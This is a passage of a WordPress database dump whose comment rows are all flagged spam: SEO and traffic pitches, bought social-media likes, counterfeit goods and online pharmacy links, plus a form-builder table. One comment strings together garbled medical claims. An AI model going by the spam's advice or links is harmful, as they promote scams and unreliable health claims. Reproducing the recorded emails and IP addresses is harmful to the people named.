(237, 2244, 'Alisa', 'bampgmskhka@beagrinbol.com', 'http://www.prestonkincaid.com/link/o', '107.189.17.200', '2016-10-26 12:18:26', '2016-10-26 17:18:26', 'Hi my name is Alisa and I just wanted to drop you a quick message here instead of calling you. I discovered your Global Belief Relief | Clear Your Beliefs website and noticed you could have a lot more visitors. I have found that the key to running a successful website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my site. http://gd.is/y/46o6a     - Unsubscribe here: http://gd.is/y/eyzsv', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(238, 2136, 'http://dranjukhanna.com/images/sitemap.xml', 'pvfqlr@gmail.com', 'http://dranjukhanna.com/images/sitemap.xml', '175.44.9.87', '2016-10-27 16:21:50', '2016-10-27 21:21:50', '5. Relative to Brady making Cleveland''s defense look foolish is Joe Haden''s average distance traveled per tackle, which was an astounding 30 yards per takedown, of which he had seven.', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(239, 2244, 'IrishcwMfcpv', 'declanking@t-online.de', 'http://Alan.free.fr', '188.208.1.73', '2016-10-28 00:25:43', '2016-10-28 05:25:43', 'I see your website needs some fresh &amp; unique content. Writing manually is time \r\nconsuming, but there is tool for this task.\r\nJust search for; Fasrixo''s tools', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36', '', 0, 0),
(240, 2136, 'Generic doctor', 'vickeyonus@napalm51.gq', 'https://www.youtube.com/watch?v=vIJzPyBZiQA', '107.173.230.205', '2016-10-30 12:36:36', '2016-10-30 17:36:36', 'Nice internet site you have in here. https://www.youtube.com/watch?v=vIJzPyBZiQA', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', '', 0, 0),
(241, 2244, 'Wiley90', 'bobbye.barrenger@yahoo.de', 'http://Vanita.wikispaces.com', '216.115.156.213', '2016-10-30 12:36:52', '2016-10-30 17:36:52', 'Reading your website is pure pleasure for me, it deserves to \r\ngo viral, you need some initial traffic only. If you want to \r\nknow how to get it search for: blackhatworren''s strategies', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', '', 0, 0),
(242, 2136, 'Carolina Panthers jerseys free shipping', 'adfzbnq@gmail.com', 'http://www.steerking.com/carolina-panthers-jerseys.html', '175.44.9.89', '2016-10-30 14:40:54', '2016-10-30 19:40:54', '? Dodgers vs. Nationals NLDS coverage', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(243, 2136, 'http://www.cdc.org.in/consultinghub/sitemap.xml', 'vhvonswnntz@gmail.com', 'http://www.cdc.org.in/consultinghub/sitemap.xml', '175.44.9.89', '2016-11-01 08:59:17', '2016-11-01 13:59:17', 'use, though. Troy Polamalu. Troy features debatably turn out to be one of the Pittsburgh Steelers one guyfrom that furlough program who messedup, maybe it wasn''t so bad. Secondly, Iwondered why no when shopping online, many shoppers check out a number of well-known online auction websites before they', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(244, 2136, 'seo plugin', 'edxkqy@gmail.com', 'http://www.SEORankingLinks.us/', '196.196.39.133', '2016-11-05 18:26:12', '2016-11-05 23:26:12', 'Hello Web Admin, I noticed that your On-Page SEO is is missing a few factors, for one you do not use all three H tags in your post, also I notice that you are not using bold or italics properly in your SEO optimization. On-Page SEO means more now than ever since the new Google update: Panda. No longer are backlinks and simply pinging or sending out a RSS feed the key to getting Google PageRank or Alexa Rankings, You now NEED On-Page SEO. So what is good On-Page SEO?First your keyword must appear in the title.Then it must appear in the URL.You have to optimize your keyword and make sure that it has a nice keyword density of 3-5% in your article with relevant LSI (Latent Semantic Indexing). Then you should spread all H1,H2,H3 tags in your article.Your Keyword should appear in your first paragraph and in the last sentence of the page. You should have relevant usage of Bold and italics of your keyword.There should be one internal link to a page on your blog and you should have one image with an alt tag that has your keyword....wait there''s even more Now what if i told you there was a simple Wordpress plugin that does all the On-Page SEO, and automatically for you? That''s right AUTOMATICALLY, just watch this 4minute video for more information at. <a href="http://www.SEORankingLinks.us" rel="nofollow">Seo Plugin</a>', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(245, 2244, 'faux chanel sac a main noir', 'cbxsext@gmail.com', 'http://www.luxe-chanel.com/', '113.66.41.3', '2016-11-07 13:46:19', '2016-11-07 18:46:19', 'Chronic kidney failure - Chronic kidney or renal failure (uremia) occurs when the kidneys gradually fail to function properly. Duloxetine , citalopram and bupropion are other antidepressants that may support. This might be in conjunction with aching and shock-like pains running through various parts of your body.\r\nfaux chanel sac a main noir http://www.luxe-chanel.com/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(252, 2136, '88Tawnya', 'maxwellhardey@gmx.net', 'http://Sal.typepad.com', '180.173.163.233', '2016-12-02 15:37:47', '2016-12-02 20:37:47', 'Hello admin ! I read your posts everyday and i must say you have \r\nvery interesting content here. Your blog deserves \r\nto go viral. You need initial boost only.\r\nHow to go viral fast? Search for; forbesden''s tools', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60', '', 0, 0),
(253, 2136, 'generic doctor', 'christinebluett@cyber-phone.eu', 'https://www.youtube.com/watch?v=vIJzPyBZiQA', '104.227.66.166', '2016-12-03 01:26:52', '2016-12-03 06:26:52', 'this image is actually the one! https://www.youtube.com/watch?v=vIJzPyBZiQA', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36', '', 0, 0),
(254, 2244, 'Renato', 'tiaraauger@gmail.com', 'http://Philomena.typepad.com', '199.87.80.18', '2016-12-10 06:27:24', '2016-12-10 11:27:24', 'I see interesting articles here. Your blog can go viral easily, you \r\nneed some initial traffic only. How to get it? Search for: ricusso''s \r\nmethods massive traffic', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0', '', 0, 0),
(255, 2136, 'Evelyn Serrell', 'khcocj@nheidxpqttn.com', 'http://hdmh.info/37', '65.36.116.153', '2016-12-10 22:24:57', '2016-12-11 03:24:57', 'This is a message to the website creator. I discovered your 7 Steps to Clear Any Belief | Clear Your Beliefs page by searching on Google but it was difficult to find as you were not on the first page of search results. I know you could have more traffic to your site. I have found a website which offers to dramatically increase your website rankings and traffic to your website: http://hud.sn/6sk5 I managed to get close to 500 visitors/day using their services, you can also get many more targeted visitors from Google than you have now. Their services brought significantly more visitors to my site. I hope this helps!', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(256, 2136, 'Jennifer', 'xnaxso@ktmllddspcd.com', 'http://r.advantech.com/oq', '209.95.50.161', '2016-12-12 18:32:55', '2016-12-12 23:32:55', 'Did you just create your new Facebook page? Do you want your page to look a little more "established"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://8si.ru/2l3ih', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(257, 2136, '90Selena', 'alicraigie@gmail.com', 'https://google.no', '66.226.103.134', '2016-12-13 23:15:31', '2016-12-14 04:15:31', 'Hello admin !! I read your website everyday and \r\ni must say you have hi quality posts here. Your \r\nwebsite deserves to go viral. You need initial traffic only.\r\n\r\nHow to go viral fast? Search for; forbesden''s tools', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', '', 0, 0),
(258, 2136, 'Evelyn Serrell', 'xxuymblrcr@iosawxytlen.com', 'http://hud.sn/6sk5', '64.145.94.86', '2016-12-15 12:48:25', '2016-12-15 17:48:25', 'This is a message to the webmaster. I came to your 7 Steps to Clear Any Belief | Clear Your Beliefs page by searching on Google but it was hard to find as you were not on the front page of search results. I know you could have more visitors to your site. I have found a website which offers to dramatically improve your website rankings and traffic to your website: http://hud.sn/6sk5 I managed to get close to 500 visitors/day using their service, you can also get a lot more targeted visitors from search engines than you have now. Their service brought significantly more traffic to my website. I hope this helps!', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(259, 2136, 'Jennifer', 'asvjhylejrv@loddpd.com', 'http://8si.ru/2gerk', '104.207.136.10', '2016-12-17 03:12:34', '2016-12-17 08:12:34', 'Did you just create your new Facebook page? Do you want your page to look a little more "established"? I found a service that can help you with that. They can send organic and 100% real likes and followers to your social pages and you can try before you buy with their free trial. Their service is completely safe and they send all likes to your page naturally and over time so nobody will suspect that you bought them. Try their service for free here: http://8si.ru/2gerk', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(260, 2244, 'ofamajuyafe', 'ujuhazmdi@mailer.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-18 11:39:20', '2016-12-18 16:39:20', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36', '', 0, 0),
(261, 2244, 'ecufoiquj', 'iifuqiu@mailer.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-18 11:53:26', '2016-12-18 16:53:26', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36', '', 0, 0),
(262, 2244, 'eyidamo', 'akazuy@pop3.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-18 20:24:19', '2016-12-19 01:24:19', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36', '', 0, 0),
(263, 2244, 'ugupekal', 'ukuipove@pop3.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-18 20:38:30', '2016-12-19 01:38:30', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36', '', 0, 0),
(264, 2244, 'ereuney', 'esoqoq@mailer.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-19 07:48:16', '2016-12-19 12:48:16', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36', '', 0, 0),
(265, 2244, 'okilfibiuq', 'ecohetat@mailer.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.141', '2016-12-19 08:02:07', '2016-12-19 13:02:07', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36', '', 0, 0),
(266, 2136, 'Evelyn Serrell', 'xnwsoteb@kxhhwj.com', 'http://dtl.la/tmJ9x', '75.70.187.133', '2016-12-19 13:50:29', '2016-12-19 18:50:29', 'This is a memo to the website creator. I came to your 7 Steps to Clear Any Belief | Clear Your Beliefs page by searching on Google but it was difficult to find as you were not on the first page of search results. I know you could have more traffic to your website. I have found a site which offers to dramatically improve your website rankings and traffic to your website: http://hdmh.info/37 I managed to get close to 500 visitors/day using their service, you can also get a lot more targeted traffic from Google than you have now. Their services brought significantly more visitors to my site. I hope this helps!', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 301A3', '', 0, 0),
(267, 2244, 'inuhakuhi', 'uluboy@newmail.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.143', '2016-12-20 01:59:20', '2016-12-20 06:59:20', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', '', 0, 0),
(268, 2244, 'awaxecumalena', 'ekamohim@newmail.printemailtext.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.143', '2016-12-20 02:13:49', '2016-12-20 07:13:49', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0', '', 0, 0),
(269, 2136, 'Jennifer', 'bcvmfvk@frlrbxn.com', 'http://8si.ru/2gerk', '162.216.46.20', '2016-12-20 20:46:45', '2016-12-21 01:46:45', 'I decided to leave a message here on your 7 Steps to Clear Any Belief | Clear Your Beliefs page instead of calling you. Do you need more likes for your Facebook Fan Page? The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service I found: http://tapeciarnia.waw.pl/1xcx2', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(270, 2244, 'utowusi', 'jiyuciv@g.eamale.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.7', '2016-12-20 23:10:11', '2016-12-21 04:10:11', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; rv:44.0) Gecko/20100101 Firefox/44.0', '', 0, 0),
(271, 2244, 'azoajeluje', 'unrawaht@g.eamale.com', 'http://20mg-cheapest-pricelevitra.net/', '91.200.12.7', '2016-12-20 23:25:17', '2016-12-21 04:25:17', 'http://dutasterideavodartonline.org/ - dutasterideavodartonline.org.ankor <a href="http://online-purchaselevitra.net/" rel="nofollow">online-purchaselevitra.net.ankor</a> http://20mg-cheapest-pricelevitra.net/', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0', '', 0, 0),
(272, 2136, 'Evelyn Serrell', 'jnjtelaqgvy@kyztwrztqq.com', 'http://hdmh.info/37', '198.8.80.60', '2016-12-22 21:51:38', '2016-12-23 02:51:38', 'This is a memo to the webmaster. I came to your 7 Steps to Clear Any Belief | Clear Your Beliefs page by searching on Google but it was difficult to find as you were not on the front page of search results. I know you could have more visitors to your site. I have found a company which offers to dramatically increase your website rankings and traffic to your website: http://hud.sn/6sk5 I managed to get close to 500 visitors/day using their service, you can also get many more targeted visitors from Google than you have now. Their service brought significantly more traffic to my site. I hope this helps!', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(273, 2244, 'CortezReming', 'donettemagee@gmail.com', 'http://Amado95.blogspot.co.uk', '183.245.147.55', '2016-12-25 01:52:09', '2016-12-25 06:52:09', 'I see your website needs some fresh articles. Writing manually is time consuming, but there is tool for this \r\ntask. Just search for; Digitalpoilo''s tools', 0, 'spam', 'Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(274, 2136, 'Jennifer', 'lzeqdtot@ilsnwfu.com', 'http://nt4.pl/u/72', '108.41.45.235', '2016-12-25 02:26:37', '2016-12-25 07:26:37', 'I decided to leave a message here on your 7 Steps to Clear Any Belief | Clear Your Beliefs page instead of calling you. Do you need more likes for your Facebook Fan Page? The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service I found: http://r.advantech.com/oq', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(275, 2244, 'Evelyn Serrell', 'nsjpmqyrar@orbhjwiwj.com', 'http://soiq.ch/pjj6', '45.50.158.2', '2016-12-29 01:02:41', '2016-12-29 06:02:41', 'This is a memo to the webmaster. I discovered your Global Belief Relief | Clear Your Beliefs page by searching on Google but it was difficult to find as you were not on the first page of search results. I know you could have more traffic to your website. I have found a site which offers to dramatically increase your website rankings and traffic to your site: http://webhop.se/1ix I managed to get close to 500 visitors/day using their service, you can also get many more targeted traffic from search engines than you have now. Their services brought significantly more traffic to my site. I hope this helps!', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(276, 2244, 'Jennifer', 'rmxfbf@znkzizb.com', 'http://brt.st/5pFF', '107.184.214.228', '2016-12-31 11:39:51', '2016-12-31 16:39:51', 'I decided to leave a message here on your Global Belief Relief | Clear Your Beliefs page instead of calling you. Do you need more likes for your Facebook Fan Page? The more people that LIKE your website and fanpage on Facebook, the more credibility you will have with new visitors. It works the same for Twitter, Instagram and Youtube. When people visit your page and see that you have a lot of followers, they now want to follow you too. They too want to know what all the hype is and why all those people are following you. Get some free likes, followers, and views just for trying this service I found: http://8si.ru/2gerk', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(277, 2244, 'Livia Schacter', 'qohjmlmfyvj@whmvqjqgh.com', 'http://mod24.pl/8', '176.31.39.23', '2017-01-01 22:13:58', '2017-01-02 03:13:58', 'Hi my name is Livia Schacter and I just wanted to drop you a quick message here instead of calling you. I discovered your Global Belief Relief | Clear Your Beliefs page and noticed you could have a lot more traffic. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get keyword targeted visitors from and they let you try the service for free for 7 days. I managed to get over 300 targeted visitors to day to my website. http://iscripts.co/r', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(278, 2244, 'Norris96', 'maribelmaness@googlemail.com', 'http://Colby.blogspot.fr', '94.23.65.156', '2017-01-02 14:50:46', '2017-01-02 19:50:46', 'This post is really interesting, but why it is on 14th place in google''s search results.\r\nIt deserves to be in top 5. Many bloggers \r\nthink that seo is dead in 2016, but it''s not true.\r\nThere is sneaky method to reach google''s top 5 that not \r\nmany people know. Just search for:  pandatsor''s tools', 0, 'spam', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36', '', 0, 0),
(279, 2244, 'Livia Schacter', 'fbvyzqsupz@nqfztdfz.com', 'http://mod24.pl/8', '176.31.39.23', '2017-01-04 09:41:21', '2017-01-04 14:41:21', 'I was just looking at your Global Belief Relief | Clear Your Beliefs website and see that your site has the potential to get a lot of visitors. I just want to tell you, In case you don''t already know... There is a website service which already has more than 16 million users, and most of the users are interested in websites like yours. By getting your site on this service you have a chance to get your site more popular than you can imagine. It is free to sign up and you can read more about it here: http://c.or.at/25v - Now, let me ask you... Do you need your site to be successful to maintain your way of life? Do you need targeted traffic who are interested in the services and products you offer? Are looking for exposure, to increase sales, and to quickly develop awareness for your site? If your answer is YES, you can achieve these things only if you get your website on the network I am talking about. This traffic network advertises you to thousands, while also giving you a chance to test the service before paying anything at all. All the popular sites are using this service to boost their traffic and ad revenue! Why aren’t you? And what is better than traffic? It’s recurring traffic! That''s how running a successful site works... Here''s to your success! Find out more here: http://c.or.at/25v', 0, 'spam', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(127) NOT NULL,
  `mail` varchar(128) NOT NULL,
  `form_front` longtext NOT NULL,
  `theme` int(11) NOT NULL,
  `javascript` text NOT NULL,
  `submit_text` longtext NOT NULL,
  `url` varchar(200) NOT NULL,
  `submit_text_type` tinyint(4) NOT NULL,
  `script_mail` text NOT NULL,
  `script_mail_user` text NOT NULL,
  `counter` int(11) NOT NULL,
  `published` int(11) NOT NULL DEFAULT '1',
  `label_order` text NOT NULL,
  `label_order_current` text NOT NULL,
  `article_id` varchar(500) NOT NULL,
  `pagination` varchar(128) NOT NULL,
  `show_title` varchar(128) NOT NULL,
  `show_numbers` varchar(128) NOT NULL,
  `public_key` varchar(50) NOT NULL,
  `private_key` varchar(50) NOT NULL,
  `recaptcha_theme` varchar(20) NOT NULL,
  `paypal_mode` int(2) NOT NULL,
  `checkout_mode` varchar(20) NOT NULL,
  `paypal_email` varchar(50) NOT NULL,
  `payment_currency` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `form_fields` text NOT NULL,
  `savedb` tinyint(4) NOT NULL DEFAULT '1',
  `sendemail` tinyint(4) NOT NULL DEFAULT '1',
  `requiredmark` varchar(20) NOT NULL DEFAULT '*',
  `from_mail` varchar(128) NOT NULL,
  `from_name` varchar(128) NOT NULL,
  `reply_to` varchar(128) NOT NULL,
  `send_to` varchar(128) NOT NULL,
  `autogen_layout` tinyint(4) NOT NULL DEFAULT '1',
  `custom_front` longtext NOT NULL,
  `mail_from_user` varchar(128) NOT NULL,
  `mail_from_name_user` varchar(128) NOT NULL,
  `reply_to_user` varchar(128) NOT NULL,
  `condition` text NOT NULL,
  `mail_cc` varchar(128) NOT NULL,
  `mail_cc_user` varchar(128) NOT NULL,
  `mail_bcc` varchar(128) NOT NULL,
  `mail_bcc_user` varchar(128) NOT NULL,
  `mail_subject` varchar(128) NOT NULL,
  `mail_subject_user` varchar(128) NOT NULL,
  `mail_mode` tinyint(4) NOT NULL DEFAULT '1',
  `mail_mode_user` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment` tinyint(4) NOT NULL DEFAULT '1',
  `mail_attachment_user` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=11 ;

--
-- Dumping data for table `cyb_formmaker`
--

INSERT INTO `cyb_formmaker` (`id`, `title`, `mail`, `form_front`, `theme`, `javascript`, `submit_text`, `url`, `submit_text_type`, `script_mail`, `script_mail_user`, `counter`, `published`, `label_order`, `label_order_current`, `article_id`, `pagination`, `show_title`, `show_numbers`, `public_key`, `private_key`, `recaptcha_theme`, `paypal_mode`, `checkout_mode`, `paypal_email`, `payment_currency`, `tax`, `form_fields`, `savedb`, `sendemail`, `requiredmark`, `from_mail`, `from_name`, `reply_to`, `send_to`, `autogen_layout`, `custom_front`, `mail_from_user`, `mail_from_name_user`, `reply_to_user`, `condition`, `mail_cc`, `mail_cc_user`, `mail_bcc`, `mail_bcc_user`, `mail_subject`, `mail_subject_user`, `mail_mode`, `mail_mode_user`, `mail_attachment`, `mail_attachment_user`) VALUES
(1, 'Contact', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="3" class="wdform_row">%3 - Subject:%</div><div wdid="4" class="wdform_row">%4 - Message:%</div><div wdid="5" class="wdform_row">%5 - type_submit_reset_5%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 1, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 6, 1, '1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Subject:#**label**#type_text#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****#', '1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Subject:#**label**#type_text#****#4#**id**#Message:#**label**#type_textarea#****#5#**id**#type_submit_reset_5#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*70*:*w_field_label_size*:*left*:*w_field_label_pos*:*****:*w_first_val*:*****:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*70*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:**:*w_unique*:**:*w_class*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Subject:*:*w_field_label*:*70*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Message:*:*w_field_label*:*70*:*w_field_label_size*:*left*:*w_field_label_pos*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*5*:*id*:*type_submit_reset*:*type*:*type_submit_reset_5*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(2, 'Fill Form To Get Admission', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name:%</div><div wdid="2" class="wdform_row">%2 - E-mail:%</div><div wdid="4" class="wdform_row">%4 - Phone Number:%</div><div wdid="5" class="wdform_row">%5 - SELECT COLLEGE%</div><div wdid="6" class="wdform_row">%6 - OTHER SPECIFY HERE%</div><div wdid="7" class="wdform_row">%7 - Word Verification:%</div><div wdid="8" class="wdform_row">%8 - type_submit_reset_8%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 8, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 9, 1, '1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#4#**id**#Phone 